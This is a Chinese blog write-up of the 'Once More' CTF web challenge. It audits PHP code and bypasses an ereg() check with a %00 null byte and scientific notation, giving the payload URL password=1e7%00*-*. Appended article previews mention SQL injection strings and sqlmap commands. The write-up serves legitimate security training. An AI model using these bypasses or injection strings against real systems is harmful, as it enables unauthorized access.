ctf-实验吧-web-Once More-wp

最新推荐文章于 2020-07-06 15:49:02 发布
原创 最新推荐文章于 2020-07-06 15:49:02 发布 · 407 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

  这个题是我第二遍做,第一遍是第一个账号做的,当时还是小白,真的什么也不会,当然现在水平还是很低。。。

  第二遍又重创了个实验吧的账号,这次打算不去上网搜 wp,自己做做看,开是刷题。。。

  ereg()函数漏洞,科学记数法,

~~~打开后,点击view the source code,直接可以看到源代码,毋庸置疑,代码审计

<?php
if (isset ($_GET['password'])) {
	if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
	{
		echo '<p>You password must be alphanumeric</p>';
	}
	else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
	{
		if (strpos ($_GET['password'], '*-*') !== FALSE)
		{
			die('Flag: ' . $flag);
		}
		else
		{
			echo('<p>*-* have not been found</p>');
		}
	}
	else
	{
		echo '<p>Invalid password</p>';
	}
}
?>	if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
	{
		echo '<p>You password must be alphanumeric</p>';
	}
	else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
	{
		if (strpos ($_GET['password'], '*-*') !== FALSE)
		{
			die('Flag: ' . $flag);
		}
		else
		{
			echo('<p>*-* have not been found</p>');
		}
	}
	else
	{
		echo '<p>Invalid password</p>';
	}
}
?>

要满足四个条件

1.You password must be alphanumeric,2.strlen($_GET['password']) < 8 ,3.$_GET['password'] > 9999999,4.(strpos ($_GET['password'], '*-*') !== FALSE)

strlen()函数为返回password的长度,用get方式传递password,strpos()函数:返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE。  4.!== FALSE   即含有*-*

条件2和3,用普通的方法1000000似乎无法同时满足两者,但是10000000=1e7,可以绕过

条件1是ereg函数,这个函数有个漏洞,ereg函数存在NULL截断漏洞,导致了正则过滤被绕过,所以可以使用%00截断正则匹配,ereg读到%00的时候,就截止了,检测只能有a-zA-Z0-9,不能有*-等等特殊,可以绕过对*-的检测,不能检测出含有*-

似乎payload已经可以构造出来了,即1e7%00*-*,或1e8%00*-*,或1e9%00*-*,

但是若是直接从网页上输入到password的窗口是行不通的,可能是有一次url转换,应该从此页面的url上直接输入payload,

http://ctf5.shiyanbar.com/web/more.php?password=1e7%00*-*

http://ctf5.shiyanbar.com/web/more.php?password=1e8%00*-*

http://ctf5.shiyanbar.com/web/more.php?password=1e9%00*-*

即可跳转到有flag的页面

woy66
关注
CTF实验-WEB专题-5
qq_18661257的专栏
12-22 6108
1.上传绕过 题解 题目说是绕过,那就绕过吧,发现,上传除了php文件外会报需要传php文件,而传php文件则会报必须上传.jpg这些图片文件,那就从上传漏洞开始吧,一般常见的上传漏洞就是截断了,是0x00数据会截断后续数据,当数据为abc.php0x001.jpg时,服务器会处理为abc.php,而0x00后的数据会忽略(产生原因magic_quotes_gpc未打开,同时相关数据没有进行处理
实验ctf
四盘山博客
07-25 3361
1/登陆一下好吗??http://ctf5.shiyanbar.com/web/wonderkun/web/index.html =' =' ctf{51d1bf8fb65a8c2406513ee8f52283e7} 2/who are you ? http://ctf5.shiyanbar.com/web/wonderkun/index.php import requests impor
CTF---Web入门第十题 Once More
weixin_33943347的博客
11-18 171
Once More分值:10 来源: iFurySt 难度:易 参与人数:4782人 Get Flag:2123人 答题人数:2166人 解题通过率:98% 啊拉?又是php审计。已经想吐了。 hint:ereg()函数有漏洞哩;从小老师就说要用科学的方法来算数。 格式:CTF{} 解题链接: ...
实验Once more
weixin_33877092的博客
01-27 154
0x1函数解析 ereg(): *用指定的模式搜索一个字符串中指定的字符串,如果匹配成功返回true,否则,则返回false。 搜索字母的字符是大小写敏感的。 * 此函数存在两个漏洞: ①%00截断及遇到%00则默认为字符串的结束...
CTF-实验Once More
才不是小弱鸡的博客
05-10 1245
题目地址:http://www.shiyanbar.com/ctf/1805这是题目的提示,根据社会工程学的方法找到了ereg的漏洞(其实就是百度。。。)漏洞是ereg函数存在截断漏洞。这里表示输入的password必须是大小写字母和数字这句表示password长度要小于8且大小要大于9999999,这不是自我矛盾嘛嘤嘤嘤。其实这里可以用科学记数法传参,password=1e9就行啦~这句表示pa...
实验web
mengtongxch的博客
10-19 229
题目: 很明显。过年过节不送礼,送礼就送这个 格式: 解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1 首先用sqlmap判断是否存在sql注入 sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" 然后爆出其数据库名称 sqlmap -u "http://ctf5.shiya...
实验Web
paintShadow的博客
08-02 403
打开链接后只有一句"have a fun!",并没有发现PHP代码,于是尝试从抓包,在响应中获取了有用的信息 发现存在一个名为6c525af4059b4fe7d8c33a.txt的文件,访问就会得到代码,审计代码得到: <?php $info = ""; $req = []; $flag="xxxxxxxxxx"; ini_set("display_error", false); er...
实验ctf:
释晓的博客
09-25 680
一、后台登录: 格式:flag:{xxx} http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 解题思路:查看源码,代码审计 想到构建万能密码,1‘ or ’1‘=’1,  但md5加密无法构建万能密码 发现链接字符,输入试一下,竟然出现flag  ...
CTF实验吧——认真一点!
Iaired的博客
07-06 369
我的第一只小爬虫 爆数据库长度 import requests import re import string import threading import time s = requests.session() url = "http://ctf5.shiyanbar.com/web/earnest/index.php" str1 = "You are in" header = { ...
CTF实验吧——证明自己吧
weixin_30800807的博客
09-09 306
题目地址:http://www.shiyanbar.com/ctf/28 没有壳 ,vc++ 写的 拖进OD观察观察,发现代码很短哟,先来看这俩个call 怀疑他们其中有正确的flag和我们输入的东西对比 强行爆破完寄存器里是没有正确的flag出现的,肯定是在某个函数里算出来的。 再进IDA里 main 空格,发现 关键函数就是sub_401060 ...
CTF 实验吧——天下武功唯快不破(node)
AaronLuo
09-02 638
题目 看看响应头 格式:CTF{ } 解题链接 提示 看看响应头,则在浏览器中查看RESPONSE Header 在RESPONSE中,有一段注释,发送POST请求,请求体为以key为键 毫无疑问,肯定是响应头的FLAG值 观察响应头的FLAG值,很明显是经过BASE64加密了,通过BASE64解码可以看到 解码之后隐约可以看到POST_THIS_TO_CHANGE_FLAG,那么将其值,构...
实验吧——WEB-认真一点!
迷风小白
04-12 2779
认真一点! 打开链接,看到这个页面,第一反应又是sql注入 翻翻源码没有任何提示 打开burp开始抓包,包头与返回头又没有任何提示,试着开始修改ID 的值,观察页面变化。 提交1或用语句让框内为真,显示You are in。 提交语句有错误或语句让框内为假,不报错,但显示You are not in(实质和报错一样) 提交某些特殊字符会被过滤并显示sql injection dete...
实验-web-wp
Iambangbang的博客
08-21 677
登陆一下好吗? 这道题目是一道技巧性的题目,显然,问题的关键在于通过语句构造使得返回报错,然而,我也并不知道如何去构造,这道题是看了一位师傅的WP才写出来的,原来万能密码可以这样用……涨知识了。 ,起初尝试万能密码,提交以后,回弹 ,发现or被过滤了。。然后我就没往后想,继续策马奔腾去了,某位师傅的做法比较高明,直接构造admin’=’进行提交,回弹flag Who are you? 点
实验CTF(认真一点!)
欢迎光临
12-13 1922
输入1 输入2或者其他内容 看来只有输入1猜显示you are in 输入其他都是you are not in  输入; 过滤了: union 空格 逗号 % and ^ sleep substr | # ; 发现or 没有过滤 先看看可以用哪些来代替空格 经过测试  /**/  可以代替空格 于是构造 id=1'/**/or/**/1='1 按理来...
once more-实验
Xi4or0uji
05-10 404
&lt;?phpif (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE) {  echo '&lt;p&gt;You password must be alphanumeric&lt;/p&gt;'; } else if (strlen($_GET['password']) ...
CTF-实验-认真你就输了
kongcz的专栏
08-03 2080
题目: 在表格里?在表格里! 格式:CTF{**} 解题链接:http://ctf5.shiyanbar.com/stega/excel_data.xlsx 解题思路: 下载下来的文件打开提示文件已损坏,用自带的修也没修出个鬼来。果断放弃换一条路 习惯性用notepad++打开该文件,头部发现类似flag的东西 按照题目的flag规则提交,提示提交成功23333333 ...
CTF——实验吧(web总结1.1)
热门推荐
加载中...
10-19 1万+
地址:http://www.shiyanbar.com/ctf/practice 一、你能跨过去吗题目:?,你是在问我吗???你是在怀疑我的能力吗??? 解题链接: http://ctf1.shiyanbar.com/basic/xss/ 思路: 1、发现所给字串中有%+数字,怀疑使用escape加密了url,使用站长工具http://tool.chinaz.com/Tools/Escape.
实验-once more
weixin_34255055的博客
11-05 156
2019独角兽企业重金招聘Python工程师标准>>> ...
PHP在CTF-Web挑战中的实战应用技巧
标题和描述中提到的知识点是关于在Web环境中使用PHP编程语言进行CTF(Capture The Flag)挑战的介绍。...在CTF-Web-Challenge的环境中,参赛者将有机会通过实战演练这些技术,提升自己的安全技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值